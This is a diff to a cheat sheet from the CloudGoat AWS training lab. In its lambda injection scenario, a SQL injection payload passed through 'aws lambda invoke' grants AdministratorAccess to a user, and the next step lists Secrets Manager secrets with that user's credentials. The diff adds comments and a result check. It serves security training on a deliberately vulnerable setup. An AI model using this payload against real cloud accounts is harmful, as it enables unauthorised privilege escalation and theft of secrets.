RhinoSecurityLabs/cloudgoat/scenarios/lambda_injection_privesc/cheat_sheet.md

 5. Invoke the role applier lambda function, passing the name of the bilbo user and the injection payload.

     ```bash
+    # The following command will send a SQL injection payload to the lambda function
     aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": [bilbo_user_name_here]}' out.txt
+    # cat the results to confirm everything is working properly
+    cat out.txt
     ```
 6. Now that Bilbo is an admin, use credentials for that user to list secrets from secretsmanager.